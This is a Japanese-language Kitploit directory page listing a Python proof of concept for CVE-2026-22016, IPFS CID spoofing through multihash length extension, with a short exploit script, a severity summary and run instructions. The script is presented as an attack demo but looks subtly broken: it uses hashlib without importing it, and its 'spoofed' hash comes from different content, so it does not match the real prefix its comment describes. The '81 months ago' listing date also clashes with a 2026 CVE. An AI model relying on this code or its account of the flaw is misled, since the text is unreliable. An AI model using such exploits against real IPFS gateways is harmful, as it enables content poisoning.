Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — multihash の長さ拡張による IPFS CID スプーフィングを実証する Python 製概念実証コード。コンテンツアドレス検証の欠陥を浮き彫りにし、IPFS ゲートウェイを汚染する可能性があります。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
脆弱性分析エクスプロイトハッシュ分析ウェブセキュリティ暗号化敵対的攻撃
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

multihash の長さ拡張による IPFS CID スプーフィングを実証する Python 製概念実証コード。コンテンツアドレス検証の欠陥を浮き彫りにし、IPFS ゲートウェイを汚染する可能性があります。

リポジトリを見る
81ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22016 – Multihash長さ拡張によるIPFS CIDスプーフィング

プログラムコード(Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Multihash長さ拡張によるIPFS CIDスプーフィング

Severity: High

概要

IPFSの実装は、CIDのmultihash内の長さフィールドを信頼し、ハッシュ自体がコンテンツ全体と一致するかを検証していません。攻撃者は、正当なファイルのハッシュのプレフィックスと一致する切り詰められたハッシュを持つファイルを作成し、同じCIDで悪意のあるファイルを配信できます。

脆弱性の詳細

  • タイプ: コンテンツスプーフィング
  • 影響: 悪意のあるコンテンツの配信、IPFSゲートウェイへのポイズニング。
  • 根本原因: CID検証では、ダイジェスト長がハッシュ関数の期待される出力と一致するかどうかを確認していません。

エクスプロイトのデモ

スクリプトを実行してください:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

これは、スプーフィングされたCIDが生成可能であることを示しています。

ツールをダウンロード